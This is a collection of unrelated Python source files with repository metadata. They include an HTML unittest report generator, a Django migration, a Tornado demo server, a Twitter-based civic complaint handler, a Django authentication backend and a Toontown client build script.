<td>Test Group/Test case</td>
<td>Count</td>
<td>Pass</td>
<td>Fail</td>
<td>Error</td>
<td>CaseShot</td>
<td>CaseInfo</td>
</tr>
%(test_list)s
<tr id='total_row'>
<td>Total and Rate</td>
<td>%(count)s</td>
<td>%(Pass)s</td>
<td>%(fail)s</td>
<td>%(error)s</td>
<td>Proportion</td>
<td>%(Pass)s/%(count)s</td>
</tr>
</table>
""" # variables: (test_list, count, Pass, fail, error)
REPORT_CLASS_TMPL = r"""
<tr class='%(style)s'>
<td>%(desc)s</td>
<td>%(count)s</td>
<td>%(Pass)s</td>
<td>%(fail)s</td>
<td>%(error)s</td>
<td>Click hyperlink view</td>
<td><a href="javascript:showClassDetail('%(cid)s',%(count)s)">Detail</a></td>
</tr>
""" # variables: (style, desc, count, Pass, fail, error, cid)
REPORT_TEST_WITH_OUTPUT_TMPL = r"""
<tr id='%(tid)s' class='%(Class)s'>
<td class='%(style)s'><div class='testcase'>%(desc)s</div></td>
<td colspan='4' align='center'>
<!--css div popup start-->
<a class="popup_link" onfocus='this.blur();' href="javascript:showTestDetail('div_%(tid)s')" >
%(status)s</a>
<div id='div_%(tid)s' class="popup_window">
<div style='text-align: right; color:red;cursor:pointer'>
<a onfocus='this.blur();' onclick="document.getElementById('div_%(tid)s').style.display = 'none' " >
[x]</a>
</div>
<pre>
%(script_out)s
</pre>
</div>
<!--css div popup end-->
</td>
<td colspan='1' align='center'><a %(hidde)s href="%(image_url)s" class="%(loseeffect)s">picture_shot</a>
</td>
<td colspan='1' align='center'>%(script_info)s</td>
</tr>
""" # variables: (tid, Class, style, desc, status)
REPORT_TEST_NO_OUTPUT_TMPL = r"""
<tr id='%(tid)s' class='%(Class)s'>
<td class='%(style)s'><div class='testcase'>%(desc)s</div></td>
<td colspan='4' align='center'>
<a class="popup_link" onfocus='this.blur();' href="javascript:showTestDetail('div_%(tid)s')" >
%(status)s</a>
<div id='div_%(tid)s' class="popup_window">
<div style='text-align: right; color:red;cursor:pointer'>
<a onfocus='this.blur();' onclick="document.getElementById('div_%(tid)s').style.display = 'none' " >
[x]</a>
</div>
<pre>
%(script_out)s
</pre>
</div>
</td>
<td colspan='1' align='center'><a %(hidde)s href="%(image_url)s" class="%(loseeffect)s">picture_shot</a>
</td>
<td colspan='1' align='center'>%(script_info)s</td>
</tr>
""" # variables: (tid, Class, style, desc, status)
REPORT_TEST_OUTPUT_TMPL = r"""
%(id)s: %(output)s
""" # variables: (id, output)
CASEINFO_OUTPUT_TMPL = r"""
%(caseinfo)s
""" # variables: (caseinfo)
# ------------------------------------------------------------------------
# ENDING
#
ENDING_TMPL = """<div id='ending'> </div>"""
CHART_TMPL = """<div class="bg">
<div class="panelBg"></div>
<div class="panel">
<div id="section1">
<div class="title">测试饼图</div>
<div class="subTitle">This chart is to show the rate that statis of test cases</div>
<div class="piechart">
<canvas id="circle" width="225" height="168" onmousemove='javascript:drawCircle(%(Pass)s, %(fail)s, %(error)s)'>your browser does not support the canvas tag</canvas>
</div>
<div class="description">
<div class="scroll-item item-even">
<div class="rect" style="background-color: #6c6; "></div>
<div class="item-text">Passcase:%(Pass)s</div>
</div>
<div class="scroll-item item-odd">
<div class="rect" style="background-color: #c60; "></div>
<div class="item-text">failcase:%(fail)s</div>
</div>
<div class="scroll-item item-even">
<div class="rect" style="background-color: #c00; "></div>
<div class="item-text">errorcase:%(error)s</div>
</div>
<div class="scroll-item item-odd">
</div>
<div class="scroll-item item-even">
</div>
</div>
<div class="button" onclick='javascript:drawCircle(%(Pass)s, %(fail)s, %(error)s)'><span class="buttonText">CLICK SEE PIE CHART</span></div>
</div>
<div id="section2">
<div class="title">测试柱状图</div>
<div class="subTitle">This chart is to show the count that statis of test cases</div>
<div class="barchart">
<canvas id="bar" width="225" height="168" onclick='javascript:drawBar(%(Pass)s, %(fail)s, %(error)s)'>your browser does not support the canvas tag</canvas>
</div>
<div class="description">
<div class="scroll-item item-even">
<div class="rect" style="background-color: #6c6; "></div>
<div class="item-text">Passcase:%(Pass)s</div>
</div>
<div class="scroll-item item-odd">
<div class="rect" style="background-color: #c60; "></div>
<div class="item-text">failcase:%(fail)s</div>
</div>
<div class="scroll-item item-even">
<div class="rect" style="background-color: #c00; "></div>
<div class="item-text">errorcase:%(error)s</div>
</div>
<div class="scroll-item item-odd">
</div>
<div class="scroll-item item-even">
</div>
</div>
<div class="button" onclick='javascript:drawBar(%(Pass)s, %(fail)s, %(error)s)'><span class="buttonText">CLICK SEE BAR CHART</span></div>
</div>
<div id="section3">
<div class="title">测试分析线形图</div>
<div class="subTitle">This chart is to show the rate that data of test cases</div>
<div class="linechart">
<canvas id="line" width="225" height="168" onclick='javascript:drawline(%(Pass)s, %(fail)s, %(error)s)'>your browser does not support the canvas tag</canvas>
</div>
<div class="description">
<div class="scroll-item item-even">
<div class="rect" style="background-color: #6c6; "></div>
<div class="item-text">Passcase:%(Pass)s</div>
</div>
<div class="scroll-item item-odd">
<div class="rect" style="background-color: #c60; "></div>
<div class="item-text">failcase:%(fail)s</div>
</div>
<div class="scroll-item item-even">
<div class="rect" style="background-color: #c00; "></div>
<div class="item-text">errorcase:%(error)s</div>
</div>
<div class="scroll-item item-odd">
</div>
<div class="scroll-item item-even">
</div>
</div>
<div class="button" onclick='javascript:drawline(%(Pass)s, %(fail)s, %(error)s)'><span class="buttonText">CLICK SEE BAR CHART</span></div>
</div>
</div>
<div class="panel1">
<div id="section4">
<a>%(Pass)s Pass cases, %(fail)s fail cases, %(error)s error cases.</a>
</div>
</div>
</div>"""
# -------------------- The end of the Template class -------------------
TestResult = unittest.TestResult
class _TestResult(TestResult):
# note: _TestResult is a pure representation of results.
# It lacks the output and reporting ability compares to unittest._TextTestResult.
def __init__(self, verbosity=1):
TestResult.__init__(self)
self.stdout0 = None
self.stderr0 = None
self.success_count = 0
self.failure_count = 0
self.error_count = 0
self.verbosity = verbosity
# result is a list of result in 4 tuple
# (
# result code (0: success; 1: fail; 2: error),
# TestCase object,
# Test output (byte string),
# stack trace,
# )
self.result = []
def startTest(self, test):
TestResult.startTest(self, test)
# just one buffer for both stdout and stderr
self.outputBuffer = io.StringIO()
stdout_redirector.fp = self.outputBuffer
stderr_redirector.fp = self.outputBuffer
self.stdout0 = sys.stdout
self.stderr0 = sys.stderr
sys.stdout = stdout_redirector
sys.stderr = stderr_redirector
def complete_output(self):
"""
Disconnect output redirection and return buffer.
Safe to call multiple times.
"""
if self.stdout0:
sys.stdout = self.stdout0
sys.stderr = self.stderr0
self.stdout0 = None
self.stderr0 = None
return self.outputBuffer.getvalue()
def stopTest(self, test):
# Usually one of addSuccess, addError or addFailure would have been called.
# But there are some path in unittest that would bypass this.
# We must disconnect stdout in stopTest(), which is guaranteed to be called.
self.complete_output()
def addSuccess(self, test):
self.success_count += 1
TestResult.addSuccess(self, test)
output = self.complete_output()
self.result.append((0, test, output, ''))
if self.verbosity > 1:
sys.stderr.write('ok ')
sys.stderr.write(str(test))
sys.stderr.write('\n')
else:
sys.stderr.write('.')
def addError(self, test, err):
self.error_count += 1
TestResult.addError(self, test, err)
_, _exc_str = self.errors[-1]
output = self.complete_output()
self.result.append((2, test, output, _exc_str))
if self.verbosity > 1:
sys.stderr.write('E ')
sys.stderr.write(str(test))
sys.stderr.write('\n')
else:
sys.stderr.write('E')
def addFailure(self, test, err):
self.failure_count += 1
TestResult.addFailure(self, test, err)
_, _exc_str = self.failures[-1]
output = self.complete_output()
self.result.append((1, test, output, _exc_str))
if self.verbosity > 1:
sys.stderr.write('F ')
sys.stderr.write(str(test))
sys.stderr.write('\n')
else:
sys.stderr.write('F')
class HTMLTestRunner(Template_mixin):
"""
"""
def __init__(self, test_name,stream=sys.stdout, verbosity=1, title=None, description=None,):
self.stream = stream
self.test_name = test_name
self.verbosity = verbosity
if title is None:
self.title = self.DEFAULT_TITLE
else:
self.title = title
if description is None:
self.description = self.DEFAULT_DESCRIPTION
else:
self.description = description
self.startTime = datetime.datetime.now()
def run(self, test, caseinfo={}):
super(HTMLTestRunner,self).__init__()
"Run the given test case or test suite."
result = _TestResult(self.verbosity)
test(result)
# print(test(result))
self.stopTime = datetime.datetime.now()
self.generateReport(test, result, caseinfo)
# print (sys.stderr, '\nTime Elapsed: %s' % (self.stopTime-self.startTime))
return result
def sortResult(self, result_list):
# unittest does not seems to run in any particular order.
# Here at least we want to group them together by class.
rmap = {}
classes = []
for n,t,o,e in result_list:
cls = t.__class__
if not cls in rmap:
rmap[cls] = []
classes.append(cls)
rmap[cls].append((n,t,o,e))
r = [(cls, rmap[cls]) for cls in classes]
return r
def getReportAttributes(self, result):
"""
Return report attributes as a list of (name, value).
Override this to add custom attributes.
"""
startTime = str(self.startTime)[:19]
duration = str(self.stopTime - self.startTime)
status = []
if result.success_count: status.append('Pass %s' % result.success_count)
if result.failure_count: status.append('Failure %s' % result.failure_count)
if result.error_count: status.append('Error %s' % result.error_count )
if status:
status = ' '.join(status)
else:
status = 'none'
return [
('Start Time', startTime),
('Duration', duration),
('Status', status),
]
def generateReport(self, test, result, caseinfo):
report_attrs = self.getReportAttributes(result)
generator = 'HTMLTestRunner %s' % __version__
stylesheet = self._generate_stylesheet()
heading = self._generate_heading(report_attrs)
report = self._generate_report(result, caseinfo)
ending = self._generate_ending()
chart = self._generate_chart(result)
output = self.HTML_TMPL % dict(
title = saxutils.escape(self.title),
generator = generator,
stylesheet = stylesheet,
heading = heading,
report = report,
ending = ending,
chart = chart,
)
self.stream.write(output.encode('utf8'))
def _generate_stylesheet(self):
return self.STYLESHEET_TMPL
def _generate_heading(self, report_attrs):
a_lines = []
for name, value in report_attrs:
line = self.HEADING_ATTRIBUTE_TMPL % dict(
name = saxutils.escape(name),
value = saxutils.escape(value),
)
a_lines.append(line)
heading = self.HEADING_TMPL % dict(
title = saxutils.escape(self.title),
parameters = ''.join(a_lines),
description = saxutils.escape(self.description),
)
return heading
def _generate_report(self, result, caseinfo):
rows = []
s= 0
sortedResult = self.sortResult(result.result)
for cid, (cls, cls_results) in enumerate(sortedResult):
# subtotal for a class
np = nf = ne = 0
for n,t,o,e in cls_results:
if n == 0: np += 1
elif n == 1: nf += 1
elif n == 2: ne += 1
# format class description
if cls.__module__ == "__main__":
name = cls.__name__
else:
name = "%s.%s" % (cls.__module__, cls.__name__)
doc = cls.__doc__ and cls.__doc__.split("\n")[0] or ""
desc = doc and '%s: %s' % (name, doc) or name
s += 1
row = self.REPORT_CLASS_TMPL % dict(
style = ne > 0 and 'errorClass' or nf > 0 and 'failClass' or 'passClass',
desc = desc,
count = np+nf+ne,
Pass = np,
fail = nf,
error = ne,
cid = 'c%s' % (cid+1),
)
rows.append(row)
i = 0
# print(cls_results)
for tid, (n,t,o,e) in enumerate(cls_results):
if len(self.test_name) == i:
break
self._generate_report_test(rows, cid, tid, n, t, o, e, caseinfo,case_name=self.test_name[i])
i += 1
report = self.REPORT_TMPL % dict(
test_list = ''.join(rows),
count = str(result.success_count+result.failure_count+result.error_count),
Pass = str(result.success_count),
fail = str(result.failure_count),
error = str(result.error_count),
)
return report
def _generate_report_test(self, rows, cid, tid, n, t, o, e, caseinfo,case_name=''):
# e.g. 'Pt1.1', 'Ft1.1','E1.1,' etc
has_output = bool(o or e)
if n == 0:
tid = 'Pt%s.%s' % (cid+1,tid+1)
elif n == 1:
tid = 'Ft%s.%s' % (cid+1,tid+1)
else:
tid = 'Et%s.%s' % (cid+1,tid+1)
name = t.id().split('.')[-1]
doc = t.shortDescription() or ""
# desc = doc and ('%s: %s' % (name, doc)) or name
desc = '用例名称:'+ case_name
tmpl = has_output and self.REPORT_TEST_WITH_OUTPUT_TMPL or self.REPORT_TEST_NO_OUTPUT_TMPL
# o and e should be byte string because they are collected from stdout and stderr?
if isinstance(o,str):
# TODO: some problem with 'string_escape': it escape \n and mess up formating
# uo = unicode(o.encode('string_escape'))
uo = e
else:
uo = o
if isinstance(e,str):
# TODO: some problem with 'string_escape': it escape \n and mess up formating
# ue = unicode(e.encode('string_escape'))
ue = e
else:
ue = e
output = saxutils.escape(uo+ue)
# print (output)
unum = str(output).find('screenshot')
# print (unum)
if (unum!=-1):
hidde_status = ''
unum=str(output).find('screenshot')
image_url = '../screenshot/'+str(output)[unum+11:unum+36].replace(' ','')
loseeffect = ''
else:
hidde_status = ''
image_url = 'javascript:void(0)'
loseeffect = 'loseeffect'
script_out = self.REPORT_TEST_OUTPUT_TMPL % dict(
id = tid,
output = saxutils.escape(uo+ue),
)
script_info = self.CASEINFO_OUTPUT_TMPL % dict(
caseinfo = caseinfo.get(desc,'No Case Detail'),
)
row = tmpl % dict(
tid = tid,
Class = (n == 0 and 'hiddenRow' or 'none'),
style = (n == 2 and 'errorCase') or (n == 1 and 'failCase') or (n == 0 and 'passCase'),
desc = desc,
status = self.STATUS[n],
script_out = script_out,
script_info = script_info,
image_url = image_url,
hidde = hidde_status,
loseeffect = loseeffect,
)
rows.append(row)
if not has_output:
return
def _generate_ending(self):
return self.ENDING_TMPL
def _generate_chart(self, result):
report = self.CHART_TMPL % dict(
Pass = str(result.success_count),
fail = str(result.failure_count),
error = str(result.error_count),
)
return report
##############################################################################
# Facilities for running tests from the command line
##############################################################################
# Note: Reuse unittest.TestProgram to launch test. In the future we may
# build our own launcher to support more specific command line
# parameters like test title, CSS, etc.
class TestProgram(unittest.TestProgram):
"""
A variation of the unittest.TestProgram. Please refer to the base
class for command line parameters.
"""
def runTests(self):
# Pick HTMLTestRunner as the default test runner.
# base class's testRunner parameter is not useful because it means
# we have to instantiate HTMLTestRunner before we know self.verbosity.
if self.testRunner is None:
self.testRunner = HTMLTestRunner(verbosity=self.verbosity)
unittest.TestProgram.runTests(self)
main = TestProgram
##############################################################################
# Executing this module from the command line
##############################################################################
if __name__ == "__main__":
main(module=None) | [
"yubei874721995@163.com"
] | yubei874721995@163.com |
aa3ef4db85fa713e0d251d91dd3b3f9531a3aae6 | 022d9bb131d5005a262b164bbc10dc0946f6cd3d | /com/migrations/0011_auto_20161130_1850.py | ca79ffb58b8a6b1da97af1b6451292cc57a197dd | [] | no_license | zoucongchao/python-django-community-web- | 1a4a6ece3f239e0caad0c5ed27c3b5aba6876fbc | d4cc1f36d1da8ff11ce464c156b0d7dd91bdfc6c | refs/heads/master | 2020-04-29T16:52:09.585386 | 2017-03-03T06:26:46 | 2017-03-03T06:26:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,387 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.1 on 2016-11-30 10:50
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('com', '0010_userprofile_collected_num'),
]
operations = [
migrations.CreateModel(
name='Keep',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_on', models.DateTimeField(auto_now_add=True)),
('question', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='com.Question')),
('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.RenameField(
model_name='userprofile',
old_name='collected_num',
new_name='keep_num',
),
migrations.RemoveField(
model_name='userprofile',
name='collected',
),
migrations.AddField(
model_name='userprofile',
name='keep',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='com.Keep'),
),
]
| [
"964333698@qq.com"
] | 964333698@qq.com |
b2d861725cf2e826e44c3c5894bafdcdc3b2cdae | 40f61f3e48fa3d433d1b74678b903aad2ba60e20 | /hellojerry.py | 514fcc6921f2a79692bf2c41944e2c4befc8dbe6 | [] | no_license | dian5wenjie/Jerry | e4a122f345834953d99702fd2fe6296d1637fc99 | b587d4414f4061bbfd1019d7c407ff495e04406a | refs/heads/master | 2016-09-06T07:46:36.923474 | 2013-03-17T11:14:58 | 2013-03-17T11:14:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,992 | py | #coding=utf8
#!/usr/bin/env python
#
# Copyright 2009 Facebook
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import tornado.httpserver
import tornado.ioloop
import tornado.options
import tornado.web
from tornado.options import define, options
define("port", default=8888, help="run on the given port", type=int)
class MainHandler(tornado.web.RequestHandler):
def get(self):
name = self.get_argument("jerry", "")
comment = {
"id": 1,
"user": "qiu",
"team": "jerry",
"content": "only Test"
}
if not name :
self.write("Welcome to Jerry!\n")
self.write("欢迎来到Jerry!")
else :
self.write(tornado.escape.json_encode(comment))
class JerryHandler(tornado.web.RequestHandler):
def get(self):
name = self.get_argument("id", "")
user = {}
if not name :
self.write("Hello jerry!\n")
self.write("你好Jerry!")
else :
print "id : %s" % (name)
user[name] = "Jerry路虎"
self.write(tornado.escape.json_encode(user))
def main():
tornado.options.parse_command_line()
application = tornado.web.Application([
(r"/", MainHandler),
(r"/jerry", JerryHandler),
])
http_server = tornado.httpserver.HTTPServer(application)
http_server.listen(options.port)
tornado.ioloop.IOLoop.instance().start()
if __name__ == "__main__":
main()
| [
"cuiqiu.bupt@gmail.com"
] | cuiqiu.bupt@gmail.com |
a38b568d0c7e11c9ab268ee40328f38346010772 | 845c3319cdbf5d3a27a65c55e37a654045ece8e5 | /custom_django_auth_backend/backend.py | 9b8e22712a3c3f7e914f55e3f088b7496692c2f9 | [
"MIT"
] | permissive | Chiorufarewerin/custom-django-auth-backend | 5dc116f05e4682ac73897012ee3a96fc609b1fad | 89aa2330933472f8cfb13ad3c488d4347b6db128 | refs/heads/master | 2021-05-17T16:36:53.342928 | 2020-04-23T09:38:31 | 2020-04-23T09:38:31 | 250,875,466 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,409 | py | from typing import Optional, Type
from django.forms import ValidationError
from .dto import UserDTO
from .exceptions import UnavailbleException, AuthException, WrongUserPasswordException, BlockedUserException
from .settings import DEFAULT_USERNAME_PREFIX
from .logging import logger
class BasicAuthBackend:
# хранить ли пользовательские пароли в случае недоступности сервиса
STORE_PASSWORDS = True
USERNAME_PREFIX = DEFAULT_USERNAME_PREFIX
def get_user_by_login(self, username: str, password: str) -> UserDTO:
"""Тут должна быть логика получения пользователя"""
raise NotImplementedError
def get_user_model(self) -> Type:
try:
from django.contrib.auth.models import User
return User
except Exception:
logger.exception('Не удалось импортировать модель User')
raise
def get_user(self, user_id: int):
return self.get_user_model().objects.filter(pk=user_id).first() or None
def get_prefixed_username(self, username: str) -> str:
return f'{self.USERNAME_PREFIX}{username}'
def get_user_by_login_exists(self, username: str, password: str):
if not self.STORE_PASSWORDS:
return None
user = self.get_user_model().objects.filter(username=self.get_prefixed_username(username)).first()
if not user:
return None
if user.check_password(password):
return user
return None
def get_and_update_user(self, username: str, password: str, user_dto: UserDTO):
user, _ = self.get_user_model().objects.update_or_create(username=self.get_prefixed_username(username),
defaults=user_dto.params)
if not self.STORE_PASSWORDS:
return user
if not user.check_password(password):
user.set_password(password)
user.save()
return user
def delete_password_user_if_exists(self, username: str):
self.get_user_model().objects.filter(
username=self.get_prefixed_username(username)
).update(password='')
def set_inactive_user_if_exists(self, username: str):
self.get_user_model().objects.filter(
username=self.get_prefixed_username(username)
).update(is_active=False)
def authenticate(self, request, username: str, password: str) -> Optional['User']:
if username is None or password is None:
return None
try:
user_dto = self.get_user_by_login(username, password)
except UnavailbleException:
return self.get_user_by_login_exists(username, password)
except WrongUserPasswordException:
self.delete_password_user_if_exists(username)
return None
except BlockedUserException as e:
self.delete_password_user_if_exists(username)
self.set_inactive_user_if_exists(username)
raise ValidationError(e.readable_error)
except AuthException:
return None
except Exception:
logger.exception('Ошибка получения пользователя')
return None
return self.get_and_update_user(username, password, user_dto)
| [
"artur1998g@gmail.com"
] | artur1998g@gmail.com |
5c14efc0e0b3c9c4b1040c89d95fd5e415c20404 | 872d8a57f0766dc34b23e1424cd7e6f7510c86e6 | /hack_api/views.py | 84242a04540aba76e7976f61e3a150af4182c6d1 | [] | no_license | ImAmanTanwar/egv-hackathon-project | 03e26b24ab1d1809bddcd47ad4f60a7410809ef2 | c115149ceee207230f103ecf8762c8b90e92268b | refs/heads/master | 2021-08-31T01:56:50.124360 | 2017-12-16T15:36:55 | 2017-12-16T15:36:55 | 114,392,102 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,963 | py | from django.shortcuts import render
from rest_framework import status
from rest_framework.decorators import api_view
from django.views.decorators.csrf import csrf_exempt
from rest_framework.response import Response
import datetime,traceback
from hackproject.models import Categories,SubCategories,Complains
import json,requests
import oauth2
import os
# Create your views here.
@api_view(['POST'])
def send(request):
twitter_auth_token_key = os.environ['CLIENT_TWITTER_TOKEN_KEY']
twitter_auth_token_secret = os.environ['CLIENT_TWITTER_TOKEN_SECRET']
tweet = request.data['tweet_text']
user_id = request.data['user_id']
hashtags = request.data['hashtags']
user_name = request.data['user_name']
handle = request.data['handle']
cat=check(hashtags)
print cat
category = Categories.objects.get(c_id=str(cat))
categories = SubCategories.objects.filter(group_id=category)
post_body="text=Select from below codes"+"\n"
for c in categories:
print c.service_name
post_body+=c.service_name+" - "+c.service_code+"\n"
post_body+="Please reply as <Phone Number>:<Status Code>:<Address>;screen_name="+handle
try:
lat=str(request.data['user_lat'])
except:
lat=""
try:
lon = str(request.data['user_lon'])
except:
lon=""
obj = Complains(tweet=tweet,user_id=user_id,user_name=user_name,lat=lat,lon=lon)
obj.save()
#post_body = "status=@"+data["handle"]+" Please reply with your phone and email in Direct Message;in_reply_to_status_id="+data["tweet_id"]
home_timeline = oauth_req( 'https://api.twitter.com/1.1/direct_messages/new.json', twitter_auth_token_key, twitter_auth_token_secret,post_body)
post_body="user_id="+user_id+";follow=true"
home_timeline = oauth_req( 'https://api.twitter.com/1.1/friendships/create.json', twitter_auth_token_key, twitter_auth_token_secret,post_body )
print post_body
return Response('{"status":"ok"}',status=status.HTTP_201_CREATED)
@api_view(['POST'])
def view(request):
user_id = request.data["user_id"]
message = request.data["message"]
if "status" in message:
code,srn_status=message.split()
stat = get_srn_status(srn_status)
post_body="user_id="+user_id+";text=Your Status is REGISTERED"
home_timeline = oauth_req( 'https://api.twitter.com/1.1/direct_messages/new.json', twitter_auth_token_key, twitter_auth_token_secret,post_body)
else:
if ":" in message:
phone, service_code,address = message.split(":")
else:
phone="0000000000"
service_code="DEFAULT"
address="Bangalore"
print phone,service_code
user = Complains.objects.filter(user_id=user_id,mobile_no="",service_code="")
service_name=SubCategories.objects.get(service_code=service_code).service_name
srn_num=""
for u in user:
u.mobile_no = phone
u.service_code = service_code
u.save()
srn_num = getsrn(service_code,service_name,u.lat,u.lon,address,u.user_name,phone,u.tweet)
print srn_num
post_body="text=Complaint Registered successfully. SRN Number: "+srn_num+";user_id="+user_id
home_timeline = oauth_req( 'https://api.twitter.com/1.1/direct_messages/new.json', twitter_auth_token_key, twitter_auth_token_secret,post_body)
with open("srn.txt", "a") as myfile:
myfile.write(srn_num+"\n")
return Response('{"status":"ok"}',status=status.HTTP_201_CREATED)
def oauth_req(url, key, secret, post_body, http_method="POST", http_headers=None):
twitter_key = os.environ['TWITTER_KEY']
twitter_secret = os.environ['TWITTER_SECRET']
consumer = oauth2.Consumer(key=twitter_key, secret=twitter_secret)
token = oauth2.Token(key=key, secret=secret)
client = oauth2.Client(consumer, token)
resp, content = client.request( url, method=http_method, body=post_body, headers=http_headers )
return content
def check(st):
a=['default','streetlight','engineering','health','administration','townplanning','revenue','watersupply']
for i,j in enumerate(a):
if j==st.lower():
return i+1;
def getsrn(service_code,service_name,lat,lon,address,name,phone,tweet):
print service_code+" "+service_name+" "+lat+" "+lon+" "+address+" "+name+" "+phone
url=os.environ["EG_API_URL"]+"?jurisdiction_id=default"
headers={"Content-Type":"application/json"}
data={
"RequestInfo":{
"api_id":"org.egov.pgr",
"ver":"1.0",
"ts":"21-04-2017 15:55:37",
"action":"POST",
"did":"4354648646",
"key":"xyz",
"msg_id":"654654",
"requester_id":"61",
"auth_token":None
},
"ServiceRequest":{
"service_code":service_code,
"description":tweet,
"address_id":"258",
"lat":lat,
"lng":lon,
"address":"Near Central area",
"service_request_id":"",
"first_name":name,
"phone":phone,
"email":"kumar@ccc.com",
"status":True,
"service_name":service_name,
"requested_datetime":"",
"media_url":"",
"tenantId":"default",
"values":{
"receivingMode":"Website",
"receivingCenter":"",
"status":"REGISTERED",
"complainantAddress":"Near central bus stop"
}
}
}
r = requests.post(url,data=json.dumps(data),headers=headers)
print r
return r.json()["service_requests"][0]["service_request_id"]
def get_srn_status(srn_num):
url = os.environ["EG_API_URL"]
params={"jurisdiction_id":"2",
"service_request_id":srn_num
}
headers={
"api_id":"org.egov.pgr",
"ver":"1.0",
"ts":"28-03-2016 10:22:33",
"action":"GET",
"did":"4354648646",
"msg_id":"03447364-19c8-4ad0-a59d-ab2a385b19d5",
"requester_id":"61",
"auth_token":"null"
}
r=requests.get(url,headers=headers,params=params)
print r.json()
| [
"amantanwar1994@gmail.com"
] | amantanwar1994@gmail.com |
47466b53530a7e9c3f7c8c4065f831ce72d30c20 | 12abe02e205d3e8dabe78fb5a93ccca89e2c42c4 | /tools/prepare_client.py | 6e73dd03164c3faee99d8c53e13fe17142da37b8 | [] | no_license | nate97/toontown-src-py3.0 | 55092b2973b76e6b6d566887f44c52822684394c | f76c515801ae08c40b264b48365211fd44b137eb | refs/heads/master | 2022-07-07T05:23:22.071185 | 2022-06-22T16:36:10 | 2022-06-22T16:36:10 | 187,682,471 | 15 | 8 | null | null | null | null | UTF-8 | Python | false | false | 6,291 | py | #!/usr/bin/env python2
import argparse
import hashlib
import os
from panda3d.core import *
import shutil
parser = argparse.ArgumentParser()
parser.add_argument('--distribution', default='en',
help='The distribution string.')
parser.add_argument('--build-dir', default='build',
help='The directory in which to store the build files.')
parser.add_argument('--src-dir', default='..',
help='The directory of the Toontown Infinite source code.')
parser.add_argument('--server-ver', default='toontown-dev',
help='The server version of this build.')
parser.add_argument('--build-mfs', action='store_true',
help='When present, the resource multifiles will be built.')
parser.add_argument('--resources-dir', default='../resources',
help='The directory of the Toontown Infinite resources.')
parser.add_argument('--config-dir', default='../config/release',
help='The directory of the Toontown Infinite configuration files.')
parser.add_argument('--include', '-i', action='append',
help='Explicitly include this file in the build.')
parser.add_argument('--exclude', '-x', action='append',
help='Explicitly exclude this file from the build.')
parser.add_argument('--vfs', action='append',
help='Add this file to the virtual file system at runtime.')
parser.add_argument('modules', nargs='*', default=['otp', 'toontown'],
help='The Toontown Infinite modules to be included in the build.')
args = parser.parse_args()
print('Preparing the client...')
# Create a clean directory to store the build files in:
if os.path.exists(args.build_dir):
shutil.rmtree(args.build_dir)
os.mkdir(args.build_dir)
print('Build directory = ' + args.build_dir)
# Copy the provided Toontown Infinite modules:
def minify(f):
"""
Returns the "minified" file data with removed __debug__ code blocks.
"""
data = ''
debugBlock = False # Marks when we're in a __debug__ code block.
elseBlock = False # Marks when we're in an else code block.
# The number of spaces in which the __debug__ condition is indented:
indentLevel = 0
for line in f:
thisIndentLevel = len(line) - len(line.lstrip())
if ('if __debug__:' not in line) and (not debugBlock):
data += line
continue
elif 'if __debug__:' in line:
debugBlock = True
indentLevel = thisIndentLevel
continue
if thisIndentLevel <= indentLevel:
if 'else' in line:
elseBlock = True
continue
if 'elif' in line:
line = line[:thisIndentLevel] + line[thisIndentLevel+2:]
data += line
debugBlock = False
elseBlock = False
indentLevel = 0
continue
if elseBlock:
data += line[4:]
return data
for module in args.modules:
print('Writing module...', module)
for root, folders, files in os.walk(os.path.join(args.src_dir, module)):
outputDir = root.replace(args.src_dir, args.build_dir)
if not os.path.exists(outputDir):
os.mkdir(outputDir)
for filename in files:
if filename not in args.include:
if not filename.endswith('.py'):
continue
if filename.endswith('UD.py'):
continue
if filename.endswith('AI.py'):
continue
if filename in args.exclude:
continue
with open(os.path.join(root, filename), 'r') as f:
data = minify(f)
with open(os.path.join(outputDir, filename), 'w') as f:
f.write(data)
# Let's write game_data.py now. game_data.py is a compile-time generated
# collection of data that will be used by the game at runtime. It contains the
# PRC file data, and (stripped) DC file:
# First, we need to add the configuration pages:
configData = []
with open('../config/general.prc') as f:
configData.append(f.read())
configFileName = args.distribution + '.prc'
configFilePath = os.path.join(args.config_dir, configFileName)
print('Using configuration file: ' + configFilePath)
with open(configFilePath) as f:
data = f.readlines()
# Replace server-version definitions with the desired server version:
for i, line in enumerate(data):
if 'server-version' in line:
data[i] = 'server-version ' + args.server_ver
# Add our virtual file system data:
data.append('\n# Virtual file system...\nmodel-path /\n')
for filepath in args.vfs:
data.append('vfs-mount %s /\n' % filepath)
configData.append('\n'.join(data))
# Next, we need the DC file:
dcData = ''
filepath = os.path.join(args.src_dir, 'astron/dclass')
for filename in os.listdir(filepath):
if filename.endswith('.dc'):
fullpath = str(Filename.fromOsSpecific(os.path.join(filepath, filename)))
print('Reading %s...' % fullpath)
with open(fullpath, 'r') as f:
data = f.read()
for line in data.split('\n'):
if 'import' in line:
data = data.replace(line + '\n', '')
dcData += data
# Finally, write our data to game_data.py:
print('Writing game_data.py...')
gameData = 'CONFIG = %r\nDC = %r\n'
with open(os.path.join(args.build_dir, 'game_data.py'), 'wb') as f:
f.write(gameData % (configData, dcData.strip()))
# We have all of the code gathered together. Let's create the multifiles now:
if args.build_mfs:
print('Building multifiles...')
dest = os.path.join(args.build_dir, 'resources')
if not os.path.exists(dest):
os.mkdir(dest)
dest = os.path.realpath(dest)
